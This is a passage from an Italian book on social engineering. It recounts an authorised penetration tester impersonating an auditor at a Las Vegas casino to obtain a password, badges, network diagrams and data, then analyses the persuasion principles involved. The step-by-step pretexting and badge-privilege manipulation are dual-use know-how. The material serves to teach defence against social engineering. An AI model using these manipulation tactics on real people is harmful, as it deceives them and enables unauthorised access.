torno indossava vestiti da dipendenti e così era altamente im- 
probabile che mi facesse delle domande.” 

Mentre camminava nella hall principale, notò che una delle 
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stanze con le telecamere sembrava proprio una di quelle che ave- 
va visto sul canale via cavo “Travel” con la differenza che questa . 
non aveva i monitor in alto. La stanza esterna aveva “il più alto 
numero di videoregistratori che abbia mai visto in un solo spa- 
zio. Wow, era davvero uno schianto!”. Ci entrò dirigendosi verso 
la stanza interna e poi fece qualcosa per cui ci voleva veramente 
del fegato: “Entrai, mi schiarii la voce e prima che potessero chie- 
dermi alcunché dissi: ‘Attenti alla ragazza sul 23”. 

Tutti i monitor erano numerati e ovviamente apparivano del- 
le ragazze in quasi tutti. Gli uomini si diressero verso il monitor 
23 e iniziarono a discutere di quali fossero le intenzioni della ra- 
gazza, cosa che secondo Whurley generò un buon livello di pa- 
ranoia. La cosa andò avanti per circa una quindicina di minuti, 
per controllare le persone sui monitor, con Whurley che pensa- 
va che quel lavoro è perfetto per chiunque abbia una propensio- 
ne per il voyeurismo. 

Mentre si apprestava ad andarsene, disse: “Oh, ero così pre- 
so da quell’azione che ho dimenticato di presentarmi. Sono Wal- 
ter delle verifiche interne. Sono stato appena assunto nello staff 
di Dan Moore”, usando il nome del capo reparto verifiche inter- 
ne che aveva appreso in una delle sue conversazioni. “E non so- 
no mai stato in questa proprietà per cui sono un po’ disorienta- 
to. Mi potreste indicare gli uffici dei direttori?” 

Gli addetti furono più che felici di liberarsi di un dirigente 
ficcanaso e pronti ad aiutare “Walter” a trovare gli uffici che sta- 
va cercando. Whurley puntò nella direzione che gli avevano in- 
dicato. Non essendoci nessuno in vista, decise di buttare uno 
sguardo in giro e trovò una stanzetta per le pause dove una gio- 
vane donna stava leggendo una rivista. “Si chiamava Megan ed 
era una ragazza molto carina. Chiacchierammo per alcuni mi- 
nuti. Poi mi disse: ‘Ah, se lavori alle verifiche interne ho delle co- 
se per loro che devo restituire.” Venne fuori che Megan aveva un 
paio di tesserini, alcuni memorandum interni e una scatola di 
carte che appartenevano al principale gruppo addetto alla sicu- 
rezza dell’ufficio verifiche interne. Whurley pensò: “Wow, ora ho 
il tesserino!”. 

Non che le persone guardino attentamente le foto sulle tes- 
sere, ma prese la precauzione di girarlo in modo che solo il retro 
fosse visibile. Uscendo dalla stanza delle pause: 


Vedo un ufficio aperto e vuoto. Ha due prese di rete, ma non posso 
sapere se sono attive solo guardandole, così ritorno al posto di Me- 
gan e le dico che ho dimenticato che dovevo dare uno sguardo al suo 
sistema e a quello “nell'ufficio del capo”. Acconsente graziosamen- 
te e mi lascia sedere alla sua scrivania. 

Mi dà la sua password non appena gliela chiedo e poi deve andare al 
bagno. Così, le dico che sto per installare un “monitor per la sicurez- 
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za di rete” e le faccio vedere l’access point wireless. Mi risponde: “Per 
me va bene, tanto non ne so nulla di questa roba da smanettoni”. 


Mentre Megan era fuori stanza, Whurley installò l'access point 
e riavviò il suo computer. Poi realizzò che aveva con sé una me- 
moria flash Usb da 256 Mb appesa alla sua catena per le chiavi e 
un accesso completo al computer di Megan. “Inizio a navigare 
nel suo hard disk e trovo tante belle cose.” Scoprì che Megan era 
l'amministratore capo di tutti i dirigenti e che aveva organizzato 
i loro file per nome, “tutti belli e ordinati”. Copiò tutto quello che 
poteva, e quindi, attivando la funzione orologio sulla sua mac- 
china digitale si scattò una foto seduto nell’ufficio principale del 
direttore. Dopo pochi minuti Megan ritornò e le chiese dove si 
trovava il Centro operazioni di rete (Noc). 

Lì andò incontro a “problemi seri”. Disse: “Prima di tutto, la 
stanza della rete era contrassegnata... il che era una buona noti- 
zia. A ogni modo, la porta era chiusa a chiave”. Non avendo una 
tessera che gli permetteva di entrare cercò di bussare: 


Viene alla porta un gentiluomo e gli racconto la stessa storia che ho 
già usato: “Salve, sono Walter delle verifiche interne e bla bla bla”. 
Ma in realtà non so che il capo del tipo - il direttore del reparto It — 
è lì in ufficio. Così il tipo alla porta mi dice: “Beh, ho bisogno di fa- 
re un controllo con Richard. Aspetti qui un minuto”, 

Si gira e dice a un altro uomo di chiamare Richard e fargli sapere che 
c'è qualcuno alla porta che “dice” di essere delle verifiche interne. Po- 
chi istanti dopo, mi beccano. Richard mi chiede con chi sono, dov'è 
il mio badge e mi fa un’altra mezza dozzina di domande in rapida suc- 
cessione. Poi mi dice: “Perché non si accomoda nel mio ufficio men- 
tre chiamo le verifiche interne così chiariamo questa cosa”. 


Whurley realizzò: “Questo tipo mi ha completamente sga- 
mato”. Ma quindi, “pensando rapidamente, gli dico: ‘Mi hai bec- 
cato!’ e gli stringo la mano. Poi mi presento: ‘Il mio nome è Whur- 
ley’, e apro la borsa per prendere il biglietto da visita. Quindi gli 
dico che mi sono spinto negli anfratti del casinò per un paio d’o- 
re e che non c’è stata una sola persona che mi abbia fermato fi- 
no a quel momento; che lui era il primo e che avrebbe fatto pro- 
babilmente una bella figura nel mio rapporto. Quindi gli dico: 
‘Andiamoci a sedere nel tuo ufficio mentre fai una telefonata per 
accertare che è tutto legittimo. Inoltre, aggiungo, ‘ho bisogno di 
andare avanti e riferire a Martha, che è la responsabile di questa 
operazione, un paio di cose che ho visto qua sotto’” 

Come mossa improvvisata in una situazione non facile, si ri- 
velò brillante. Avvenne una trasformazione incredibile. Richard 
iniziò a chiedere a Whurley quello che aveva visto, i nomi delle 
persone e così via, e poi gli spiegò che aveva condotto una veri- 
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fica per conto suo, nel tentativo di ottenere un aumento del bud- 
get per la sicurezza per rendere il Noc più sicuro, con “la biome- 
tria e tutto il resto”. E avanzò l'ipotesi che forse avrebbe potuto 
usare alcune delle informazioni di Whurley per raggiungere il suo 
scopo. 

Si era fatta ora di pranzo. Whurley colse l'occasione della- 
pertura della mensa per suggerire che forse potevano parlarne a 
pranzo. Anche a Richard sembrò una buona idea e si incammi- 
narono insieme verso il bar del personale. “Nota che non aveva- 
mo ancora chiamato nessuno a questo punto. Così suggerisco di 
fare la telefonata, e lui dice, ‘hai il biglietto da visita, so chi ser.” 
Così i due pranzarono insieme al bar, dove Whurley ricevette un 
pasto gratis e si fece un nuovo “amico”. 

“Mi chiese quale esperienza avevo nel campo delle reti e ini- 
ziammo a parlare dell’As400 su cui il casinò gestisce tutto. Il fat- 
to che le cose andarono in questo modo può essere descritto con 
due parole: assolutamente spaventoso.” Spaventoso perché Puo- 
mo che è il direttore dell’It, nonché il responsabile della sicurez- 
zainformatica, rivelò tutte le informazioni interne e riservate pos- 
sibili a Whurley senza aver mai compiuto il passo fondamentale 
di accertarsi della sua identità. 

Commentando questa considerazione, Whurley osserva che 
“i manager di livello medio non vogliono mai essere messi ‘sotto 
pressione’. Come la maggior parte di noi non vogliono mai ave- 
re torto o essere colti nell'atto di compiere un errore ovvio. Ca- 
pire la loro mentalità può essere un grande vantaggio”. Dopo 
pranzo, Richard ricondusse Whurley al Noc. 

“Non appena entrati, mi presenta Larry, il principale ammi- 
nistratore di sistema degli As400. Gli spiega che nel giro di pochi 
giorni li ‘farò a pezzi’ con una verifica e che è venuto a pranzo 
con me ed è riuscito a farmi acconsentire a una revisione preli- 
minare che gli eviterà ogni imbarazzo” quando sarebbe arrivato 
il momento del vero accertamento. Whurley quindi passò alcuni 
minuti ad ascoltare Larry che gli faceva un quadro generale dei 
sistemi, raccogliendo così altre informazioni utili per il suo rap- 
porto; per esempio, che il Noc archiviava ed elaborava tutti i da- 
ti aggregati per l’intero gruppo addetto alla sicurezza: 


Gli dissi che mi sarebbero tornati utili, per aiutarlo più velocemen- 
te, un diagramma di rete, gli elenchi sul controllo dell’accesso al fi- 
rewall, e così via, che mi fornì solo dopo aver chiamato Richard per 
l'approvazione. “Buon per lui,” pensai. 


Di colpo Whurley realizzò che aveva lasciato l'access point 
wireless nell'ufficio dei dirigenti. Anche se le chance di essere sco- 
perto erano scese drasticamente dopo aver stabilito il suo rap- 
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porto con Richard, spiegò a Larry che aveva bisogno di tornare 
sul posto per recuperare l'access point. “Per farlo avevo bisogno 
di un tesserino di riconoscimento così sarei potuto rientrare nel 
Noc e andare e venire quando volevo.” Larry sembrava un po’ ri- 
luttante a farlo, così Whurley lo invitò a richiamare Richard. Larry 
chiamò Richard e gli disse che l’ospite voleva che gli fosse rila- 
sciato un badge. Richard ebbe persino un’idea migliore: il casinò 
aveva licenziato recentemente alcuni dipendenti, i loro badge era- 
no al Noc e nessuno aveva ancora trovato il tempo di disattivar- 
li, “così va benissimo se ne usa uno di questi”. 

Whurley ritornò ad ascoltare le spiegazioni di Larry sui si- 
stemi e la descrizione delle misure di sicurezza prese recente- 
mente. Poi arrivò una telefonata dalla moglie di Larry, che era 
apparentemente arrabbiata e infastidita per qualcosa. Whurley 
colse al volo questa situazione temporanea, capendo che ne po- 
teva beneficiare. Larry disse alla moglie: “Ascolta, non posso par- 
lare ora, ho una persona in ufficio”. Whurley fece un cenno a 
Larry di mettere la moglie in attesa per un secondo e gli consi- 
gliò di discutere con lei il problema che doveva essere importan- 
te. Gli disse inoltre che avrebbe preso uno dei tesserini se Larry 
gli indicava dov'erano. 

“Così Larry mi fece strada verso uno schedario, aprì un cas- 
setto e mi disse semplicemente: ‘Prendi uno di questi’. Poi ritornò 
alla sua scrivania e riprese la cornetta. Notai che non c'erano fo- 
gli per la firma del ritiro né alcuna registrazione dei numeri dei 
tesserini, così ne presi due tra i molti disponibili.” Adesso aveva 
non un badge qualsiasi, ma uno che gli avrebbe permesso di en- 
trare nel Noc in qualsiasi momento. 

Quindi Whurley tornò indietro per vedere la sua nuova ami- 
ca Megan, recuperare il suo access point e vedere cos'altro pote- 
va scoprire. E poteva prendersi tutto il tempo che voleva: 


Pensai che il tempo non sarebbe stato un problema perché sarebbe 
rimasto al telefono con sua moglie e sarebbe stato distratto più a 
lungo di quanto pensava. Per cui inserii sul mio cronometro un con- 
to alla rovescia di venti munti, un tempo sufficiente per fare altre 
esplorazioni senza attirare ulteriori sospetti da parte di Larry, che 
sembrava sospettare che stesse accadendo qualcosa. 


Chiunque abbia mai lavorato in un reparto dell’It sa che i tes- 
serini d'identità sono collegati a un sistema informatico; acce- 
dendo alla macchina giusta puoi ampliare la tua capacità di ac- 
cesso ed entrare in qualsiasi parte dell’edificio. Whurley sperava 
di scoprire il computer che controllava i privilegi d'accesso dei 
badge in modo da poterli modificare sui due in suo possesso. Ma 
la cosa si dimostrò più difficile di quanto pensasse. Ora si senti- 
va frustrato e disorientato. 
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Decise di chiedere a qualcuno e optò per la guardia che era 
stata così amichevole all'ingresso dei dipendenti. Ormai molte 
persone l'avevano visto insieme a Richard, così i sospetti erano 
quasi inesistenti. Whurley trovò il suo uomo e gli disse che ave- 
va bisogno di visionare il sistema di controllo dell’accesso all’e- 
dificio. La guardia non chiese neanche il perché. Nessun proble- 
ma. Gli disse esattamente dove trovare quello che cercava. 

“Localizzai il sistema di controllo ed entrai nella piccola ca- 
bina del networking in cui si trovava. Lì trovai un computer sul 
pavimento con l'elenco dei tesserini di identità già aperto. Nes- 
sun salvaschermo, nessuna. password, niente che mi ostacolas- 
se.” Dal suo punto di vista, era del tutto tipico: “Le persone han- 
no una mentalità per cui ciò che è lontano dagli occhi rimane an- 
che lontano dalla testa. Se un sistema come questo è situato in 
un’area d'accesso controllata, pensano che non ci sia alcun biso- 
gno di essere diligenti nella protezione del computer”. 

Oltre ad assegnarsi un accesso completo a tutte le aree, vole- 
va fare un’altra cosa: . 


Tanto per divertirmi, pensai di prendere il badge in più che avevo, 
aggiungervi dei privilegi d'accesso, cambiare il nome e poi scam- 
biarlo con un dipendente che se ne andava in giro per il casinò e che 
mi avrebbe aiutato inconsapevolmente a confondere i file di regi- 
stro. Ma chi avrei scelto? Perché non Megan, ovviamente: sarebbe 
stato facile scambiare il tesserino con lei. Tutto quello che avrei do- 
vuto fare era dirle che avevo bisogno del suo aiuto per la verifica. 


Quando Whurley entrò, Megan fu amichevole come sempre. 
Le spiegò che aveva completato il test e che aveva bisogno di re- 
cuperare l’equipaggiamento. Quindi disse a Megan che aveva bi- 
sogno del suo aiuto: “La maggior parte degli ingegneri sociali con- 
corderebbe sul fatto che le persone vogliono sempre essere d’aiu- 
to”. Aveva bisogno di vedere il badge di Megan per controllarlo 
sulla lista che aveva. Pochi istanti dopo, Megan aveva un badge 
che avrebbe confuso ancora di più le cose, mentre Whurley ave- 
va il badge di Megan, oltre al tesserino che lo avrebbe etichetta- 
to come un dirigente nei file di registro. 

Quando Whurley tornò all'ufficio di Larry, il manager stava 
finendo agitato la telefonata con sua moglie. Alla fine riappese e 
fu pronto a riprendere la conversazione. Whurley gli chiese di 
spiegargli nel dettaglio i diagrammi di rete, ma poi si interruppe 
e, per entrare in confidenza, gli chiese come andavano le cose 
con sua moglie. I due passarono quasi un'ora a parlare di matri- 
monio e di altre questioni della vita: 


Alla fine della nostra conversazione, mi ero convinto che Larry non 
mi avrebbe più creato problemi. Così gli spiegai che il mio portati- 


261 


le aveva un software di analisi speciale che avevo bisogno di lancia- 
re sulla rete. Poiché di solito ho roba di alto livello, far sì che il por- 
tatile venga collegato alla rete è sempre facile perché non esiste uno 
smanettone sul pianeta che non lo voglia vedere in azione. 


Dopo un po’ Larry si allontanò per fare delle telefonate e oc- 
cuparsi di altre cose. Lasciato da solo, Whurley scansionò la re- 
te e riuscì a compromettere diversi sistemi — sia le macchine Li- 
nux sia Windows — per la scarsa capacità di gestione delle pass- 
word. Poi passò quasi due ore a lanciare e bloccare alcune copie 
dei dati all’esterno della rete e persino a masterizzare alcuni do- 
cumenti su Dvd, “cosa che feci senza problemi”. 


Dopo aver concluso il lavoro pensai che fosse divertente, e utile, fa- 
re un'ultima cosa. Andai da tutte le persone con cui ero entrato in 
contatto ~ e da quelle che avevo visto rapidamente in compagnia 
d'altri — e mi rivolsi loro più o meno in questi termini: “Bene, ho fi- 
nito. Potresti farmi una cortesia, vorrei scattare delle foto di tutte le 
persone e dei posti in cui ho lavorato. Ti va di scattare una foto con 
me?”. Il che si dimostrò “incredibilmente semplice”. 


Diverse persone si offrirono persino di scattare delle foto con 
lui insieme ad altri colleghi degli uffici adiacenti. 

Si era oramai assicurato i badge, i diagrammi di rete e l’ac- 
cesso alla rete del casinò. E aveva delle foto per provare il tutto. 

All'incontro di presentazione dei risultati del test, il capo 
delle verifiche interne si lamentò del fatto che Whurley non ave- 
va alcun diritto di provare a entrare nei sistemi fisicamente per- 
ché “non era quello il modo in cui sarebbero stati attaccati”. A 
Whurley fu anche detto che il suo comportamento era stato qua- 
si “da codice penale” e che il cliente non lo aveva affatto ap- 
prezzato. Spiega Whurley: 


Perché il casinò pensava che quello che avevo fatto fosse scorretto? 
La risposta è semplice. Non avevo lavorato con alcun casinò prima 
di allora e non avevo capito bene i regolamenti [in base a cui ope- 
rano]. Il mio rapporto avrebbe potuto produrre una richiesta di re- 
visione da parte della Commissione giochi, il che avrebbe potuto 
avere delle ripercussioni economiche. 


Whurley è stato pagato interamente, perciò non gli importa 
più molto. Vorrebbe aver fatto un'impressione migliore al clien- 
te ma sente che non hanno apprezzato l'approccio da lui usato 
reputandolo scorretto nei loro confronti e verso i loro dipenden- 
ti: “Mi fecero capire chiaramente che non mi volevano più avere 
tra i piedi”. 

Non gli era mai accaduto prima; di solito i clienti apprezza- 
no i risultati delle verifiche e le vedono come “piccoli esercita- 
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zioni di red teaming? o come giochi di guerra”, volendo dire con 
ciò che per loro andava bene essere testati con gli stessi metodi 
usati da un hacker ostile o da un ingegnere sociale. “I clienti so- 
no quasi sempre eccitati per questo. Anche io, fino a quel punto 
della mia carriera.” 

Nel complesso, Whurley valuta Las Vegas come un successo 
dal punto di vista del test, ma come un disastro sul fronte della 
relazione con il cliente. “Probabilmente non lavorerò mai più a 
Las Vegas,” si lamenta. 

Ma se così è, allora la Commissione giochi ha bisogno dei ser- 
vizi di consulenza di un hacker etico che già sa come raggiunge- 
re le retrovie di un casinò. 


Riflessioni 


Lo psicologo sociale, il dottor Brad Sagarin, che ha realizza- 
to una ricerca sulla persuasione, descrive l'arsenale dell’ingegne- 
re sociale in questo modo: “Non c'è niente di magico nel social 
engineering. L'ingegnere sociale impiega le stesse tecniche di per- 
suasione che tutti noi usiamo ogni giorno. Cerchiamo di costruirci 
una credibilità. Ci vincoliamo con obblighi reciproci. Ma Vinge- 
gnere sociale applica queste tecniche in modo manipolatorio, in- 
gannevole, altamente non etico, spesso con effetti devastanti”. 

Abbiamo chiesto al dottor Sagarin di fornirci delle descrizioni 
dei principi psicologici che sono alla base delle tattiche più co- 
muni usate dagli ingegneri sociali. In diversi casi, ha accompa- 
gnato la sua spiegazione con un esempio tratto dalle storie con- 
tenute nel libro precedente di Mitnick e Simon, L'arte dell'ingan- 
no, che illustrava questa tecnica particolare. 
| Ogniarticoloinizia con una spiegazione informale e non scien- 
tifica del principio, e con un esempio. 


Le vestigia dei ruoli 


L'ingegnere sociale esibisce alcune caratteristiche comporta- 
mentali del ruolo di cui sta assumendo la maschera. La maggior 
parte di noi tende semplicemente a fare il proprio dovere quando 
si trova di fronte alcune caratteristiche proprie di un ruolo. Ve- 
diamo un uomo vestito da dirigente e diamo per scontato che sia 
una persona in gamba, concentrata sul suo lavoro e affidabile. 


3 Red teaming (letteralmente “raggruppamento rosso”) è un modo di defini- 
rel’azione coordinata di dipendenti e consulenti durante i penetration test. [N.d.7.] 
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Esempio: quando Whurley entrò nella stanza “Eye in the Sky”, era 
vestito da dirigente, parlò con l'autorità di chi comanda e impartì 
agli uomini nella stanza quello che gli uomini presero per un ordi- 
ne ad agire. Aveva semplicemente assunto i panni di un manager del 
casinò o di un dirigente. 


In quasi tutti gli attacchi di social engineering, l’autore del- 
l'attacco assume i panni del ruolo che interpreta, in modo che la 
persona prescelta desuma altre caratteristiche proprie di quel 
ruolo e agisca di conseguenza. Il ruolo potrebbe essere quello di 
un qualsiasi tecnico informatico, di un cliente, di un nuovo as- 
sunto o dei molti altri che incoraggerebbero ordinariamente la 
soddisfazione di una richiesta. 

Tra gli usi più comuni c'è la citazione del nome del capo o di 
altri dipendenti, o l'utilizzo di un gergo o di una terminologia pro- 
pria dell'azienda o del settore industriale di riferimento. Per gli 
attacchi in prima persona, anche la scelta dei vestiti, dei gadget 
(la spilla di una compagnia, l'orologio da polso di un’atleta, una 
penna costosa, l'anello di una scuola) o delle acconciature (per 
esempio, un taglio di capelli), sono tutte manifestazioni che pos- 
sono conferire credibilità al ruolo assunto dall’attaccante. 

La forza di questo metodo nasce dal fatto che una volta che 
accettiamo qualcuno (per esempio un direttore, un cliente o un 
collega), facciamo delle deduzioni attribuendo altre caratteristi- 
che (un direttore è benestante e potente, uno sviluppatore softwa- 
re è tecnicamente esperto ma potrebbe essere bizzarro da un pun- 
to di vista sociale, un collega è una persona di cui fidarsi). 

Di quante informazioni abbiamo bisogno prima di iniziare a 
fare queste deduzioni? Non molte. 


La credibilità 


Rendersi credibili è il primo passo nella maggior parte degli 
attacchi di ingegneria sociale, una pietra angolare per qualsiasi 
cosa venga in seguito. 


Esempio: Whurley ha suggerito a Richard, un decano del reparto It, 
di far pranzare i due insieme, perché essere visto insieme a Richard 
gli avrebbe immediatamente conferito una credibilità di fronte a 
qualsiasi impiegato li avesse notati. 


Ne L'arte dell'inganno il dottor Sagarin ha individuato tre me- 
todi cui gli ingegneri sociali ricorrono per costruirsi una credi- 
bilità. Nel primo, l'attaccante dice qualcosa che sembrerebbe an- 
dare assolutamente contro i suoi interessi, come rivelato dal ca- 
pitolo 8 del libro, “Un invito semplice”, quando l’attaccante dice 
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alla sua vittima: “Ora vai avanti e digita la tua password ma non 
dirmi qual è. Non dovresti mai dire a nessuno la tua password, 
neanche all’assistenza tecnica”. Sembra una dichiarazione di una 
persona affidabile. 

Nel secondo metodo, l’autore dell'attacco avvisa la persona 

prescelta di un evento, sconosciuto alla stessa, che egli stesso ha 
prodotto in prima persona. Per esempio nella storia “Sospensio- 
ne di rete”, raccontata nel capitolo cinque de L'arte dell'inganno, 
l'attaccante spiega che la connessione di rete potrebbe andare 
giù. L'hacker fa poi qualcosa che fa cadere effettivamente la con- 
nessione della vittima, il che lo rende credibile agli occhi della 
stessa. 
| Questa tecnica di predizione viene spesso combinata con il 
terzo di questi metodi, in cui l'attaccante “dimostra” ulterior- 
mente la sua credibilità cercando di risolvere i problemi della vit- 
tima. Questo è quanto accade in “Sospensione di rete”, in cui si 
racconta che l’hacker prima avvisò che la rete poteva cadere, poi 
produsse la caduta della connessione della vittima, come pre- 
detto, e poi ripristinò la connessione stessa affermando di aver 
“risolto il problema”, lasciando nella vittima una sensazione di 
fiducia e gratitudine. 


Costringere l’obiettivo a un ruolo (altercasting) 


L'ingegnere sociale manovra il suo obiettivo facendogli assu- 
mere un ruolo alternativo, come il costringerlo alla sottomissio- 
ne tramite un atteggiamento aggressivo. 


Esempio: Whurley, nella sua conversazione con Lenore, si è messo 
in una posizione di necessità (si era lasciato da poco con la ragaz- 
za, si era appena trasferito in città ed era in cerca di un lavoro), on- 
de manovrarla nel ruolo di aiutante. 


Nella sua forma più comune, l'ingegnere sociale mette il suo 
bersaglio nella posizione dell’aiutante. Una volta che una perso- 
na ha accettato il ruolo di aiutante, troverà strano o difficile sot- 
trarsi all'aiuto. 

Un ingegnere sociale astuto cercherà di capire in quale ruo- 
lo la vittima si sente più a suo agio. Quindi manipolerà la con- 
versazione per manovrare la persona in quel ruolo, come fece 
Whurley con Lenore e Megan quando capì che gli sarebbero tor- 
nate utili come aiutanti. E probabile che le persone accettino dei 
ruoli che sono positivi e le fanno stare bene. 
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Distrarre dal pensiero sistematico 


Gli psicologi sociali hanno evidenziato che gli esseri umani 
elaborano le informazioni in entrata in due modi diversi: ap- 
proccio sistematico ed euristico. 


Esempio: quando un dirigente ha avuto bisogno di gestire una si- 
tuazione difficile con la moglie che era molto agitata, Whurley ha 
sfruttato lo stato emotivo dell’uomo e la sua distrazione per fare una 
richiesta che gli ha procurato un badge autentico da dipendente. 


Spiega il dottor Sagarin: “Quando elaboriamo le informazio- 
ni in modo sistematico, valutiamo attentamente e razionalmen- 
te una richiesta prima di prendere una decisione. D'altro canto, 
quando le elaboriamo euristicamente, prendiamo delle scorcia- 
toie mentali per assumere delle decisioni. Per esempio, potrem- 
mo soddisfare una richiesta basandoci su chi il richiedente af- 
ferma di essere, piuttosto che sul grado di riservatezza delle infor- 
mazioni che ci ha richiesto. Cerchiamo di operare in modo si- 
stematico quando la materia è importante per noi. Ma la pres- 
sione del tempo, la distrazione o le emozioni forti possono farci 
passare alla modalità euristica”. 

Ci piace pensare che normalmente operiamo secondo una 
modalità razionale e logica, assumendo delle decisioni basate sui 
fatti. C'è una citazione tratta da una frase dello psicologo Gre- 
gory Neidert, che dice: “Noi umani gestiamo il nostro cervello in 
modalità inattiva il 90-95 percento del tempo”. Gli ingegneri so- 
ciali cercano di trarne vantaggio, usando diversi modi per in- 
fluenzare e costringere le loro vittime ad abbandonare la moda- 
lità sistematica, ben sapendo che le persone che operano secon- 
do la modalità euristica avranno meno probabilità di ricorrere 
alle loro difese psicologiche; è meno probabile che siano sospet- 
tose, pongano delle domande o muovano delle obiezioni all’au- 
tore dell'attacco. 

Gli ingegneri sociali vogliono avvicinarsi alle persone che so- 
no in “modalità euristica” e lasciarle in quella condizione. Una 
tattica è quella di chiamare la persona prescelta cinque minuti 
prima della fine della giornata, contando sul fatto che l'ansia di 
lasciare l’ufficio in tempo possa indurre il target a soddisfare una 
richiesta che potrebbe altrimenti essere messa in discussione. 


4 L'osservazione dello psicologo Neidert può essere trovata online, 
wwwl.chapman.edu/comm/comm/faculty/thobbs/com401/socialinfluence/mind- 
fl.html. 3 
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Il momento dell’accondiscendenza 


Gli ingegneri sociali arrivano al momento dell’accondiscen- 
denza formulando una serie di richieste, ma iniziando da quelle 
più innocue. 


Esempio: il dottor Sagarin cita la storia della “CreditChex”, che ap- 
pare nel capitolo 1 de L'arte dell'inganno, in cui l’intruso dissimula 
nel mezzo di una serie di domande innocue la domanda fonda- 
mentale, quella riguardante le informazioni sensibili sul numero 
identificativo della banca di investimento che veniva usato come 
password per verificare l'identità via telefono. Dal momento che le 
domande iniziali appaiono innocue, tutto ciò crea una cornice in 
cui la vittima si ritrova nella posizione di trattare anche le informa- 
zioni più sensibili come innocue. 


L'autore/produttore televisivo Richard Levinson ne ha fatto la 
tecnica di un personaggio famoso, il tenente Colombo interpretato 
da Peter Falk. Gli spettatori sono deliziati nel sapere che mentre il 
detective se ne sta andando, e il sospetto o la sospetta abbassano 
le loro difese e si rilassano per averla fatta franca, Colombo si fer- 
ma per porre un'ultima domanda, la domanda fondamentale che 
aveva tenuto in serbo dall’inizio. Gli ingegneri sociali fanno spes- 
so uso di questa tecnica del tipo, “solo un'ultima cosa”. 


Il desiderio di aiutare 


Gli psicologi hanno identificato i molti benefici che le perso- 
rie ricevono quando aiutano gli altri. Aiutare ci può far sentire 
più forti. Ci può far passare il cattivo umore. Ci può far sentir be- 
ne con noi stessi. Gli ingegneri sociali trovano diversi modi per 
sfruttare la nostra inclinazione ad aiutare. 


Esempio: quando Whurley si è presentato all'ingresso del casinò, la 
guardia ha creduto alla storia che stava portando uno “zuccherino” 
a pranzo, gli ha prestato dei soldi per l'appuntamento, gli ha dato 
dei consigli su come trattare una donna e non si è mostrato insi- 
stente quando Whurley si è allontanato senza avergli mostrato il bad- 
ge identificativo da dipendente. 


Il dottor Sagarin commenta: “Poiché gli ingegneri sociali pren- 
dono spesso di mira persone che non conoscono il valore delle 
informazioni che stanno dando via, l’aiuto può essere percepito 
come una piccola cosa da chi lo dà”. (Quanto lavoro richiede fa- 
re una ricerca rapida su un database per il poveraccio che è al- 


l’altro capo del telefono?) 
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L'attribuzione 


Il concetto di attribuzione si riferisce al modo in cui le per- 
sone spiegano il proprio comportamento e quello degli altri. Un 
obiettivo dell'ingegnere sociale è di far sì che la persona prescel- 
ta gli attribuisca o le attribuisca certe caratteristiche, come l'e- 
sperienza, l'affidabilità, la credibilità o l’attrattività. 


Esempio: il dottor Sagarin cita la storia di “The Promotion Seeker” 
per come viene raccontata nel capitolo 10 de L'arte dell'inganno. Lau- 
tore dell'attacco se ne sta un po’ nei paraggi prima di chiedere di en- 
trare nella sala conferenze, allontanando ogni possibile sospetto per- 
ché si dà per scontato che non trascorrerebbe del tempo non ri- 
chiesto in un posto dove potrebbe essere colto in fragrante. 


Un ingegnere sociale può andare dall’addetto di una recep- 
tion, mettere una banconota da cinque dollari sul bancone e di- 
re qualcosa del tipo: “L'ho trovata sul pavimento. C'è qualcuno 
che ha perso dei soldi?”. L’'addetto gli attribuirebbe le qualità di 
una persona onesta e degna di fiducia. 

Se vediamo un uomo tenere una porta aperta per una donna 
più anziana, pensiamo che sia una persona gentile; se la donna 
è giovane e attraente, è probabile che attribuiamo un motivo dif- 
ferente. 


Piacere 


Gli ingegneri sociali traggono frequentemente vantaggio dal 
fatto che tutti noi diciamo più facilmente “sì” alle richieste di per- 
sone che ci piacciono. 


Esempio: Whurley è riuscito a ottenere delle informazioni utili da Le- 
nore, la ragazza incontrata al centro di fitness, usando in parte la “let- 
tura a freddo” per controllare le sue reazioni e ritagliare continua- 
mente le sue osservazioni sulle cose cui sarebbe stata sensibile. Ciò 
l'ha indotta a credere che avevano gusti e interessi in comune (“An- 
ch'io!”). La sensazione che lui gli piacesse l’ha resa più disponibile a 
condividere le informazioni che Whurley voleva ottenere. 


Alle persone piacciono coloro che percepiscono come simili, 
che hanno degli interessi di carriera, un background formativo e 
degli hobby simili ai loro. L'ingegnere sociale farà spesso delle ri- 
cerche sul passato del suo obiettivo e si preparerà a dissimulare 
un interesse per le stesse cose, siano esse la vela o il tennis, i vec- 
chi aereoplani, il collezionismo di pistole d’epoca o qualsiasi al- 
tra cosa. Gli ingegneri sociali possono anche aumentare la loro 
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capacità di piacere tramite l’uso di complimenti o di tecniche di 
adulazione, e gli ingegneri sociali fisicamente attraenti possono 
contare sulla loro bellezza. 

Un'altra tecnica è l’uso della citazione rapida di nomi che la 
persona prescelta conosce e apprezza. In questo caso, chi at- 
tacca cerca di farsi vedere come uno “del gruppo”, che fa parte 
dell’organizzazione. Gli hacker usano anche l’adulazione e i 
complimenti per arruffianarsi l'ego della vittima, o prendere di 
mira persone all’interno dell’organizzazione che sono state re- 
centemente ricompensate per alcuni successi. L'arruffiana- 
mento può spingere la vittima nel ruolo inconsapevole del- 
l’aiutante. 


Paura 


In alcune occasioni un ingegnere sociale fa credere alla per- 
sona prescelta che sta per accadere qualcosa di terribile, ma che 
il disastro incombente può essere evitato se la persona farà quel- 
lo che l'attaccante le chiede. In questo modo, chi attacca usa la 
paura come arma. 


Esempio: nella storia “The Emergency Path” che appare nel capito- 
lo 12 de L'arte dell'inganno, l'ingegnere sociale spaventa la sua vitti- 
ma con la minaccia della perdita di alcuni dati di valore a meno che 
essa non acconsenta a installare una patch di emergenza sul server 
su cui è ospitato il server dell'azienda. La paura espone la vittima 
alla “soluzione” suggerita dall'ingegnere sociale. 


Gli attacchi basati sullo status fanno spesso affidamento sul- 
la paura indotta. Un ingegnere sociale che si maschera come un 
dirigente aziendale può prendere di mira una segretaria o un di- 
pendente inesperto con una richiesta “urgente” e facendo capire 
che il sottoposto finirà nei guai, o potrà anche essere licenziato, 
se non obbedirà. 


La reattanza 


La reattanza psicologica è la reazione negativa che esperia- 
mo quando percepiamo che le nostre scelte o le nostre libertà so- 
no sul punto di venire meno. Quando ci troviamo negli spasmi 
della reattanza, perdiamo la nostra capacità di mettere le cose in 
prospettiva mano a mano che il desiderio per ciò che abbiamo 
perso eclissa tutto il resto. 


Esempio: due storie ne L'arte dell'inganno illustrano il potere della 
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reattanza: l'una si basa sulla minaccia della perdita di uno strumento 
importante, l’altra sulla perdita dell’accesso alla rete. 


In un attacco tipico basato sulla reattanza, chi attacca dice 
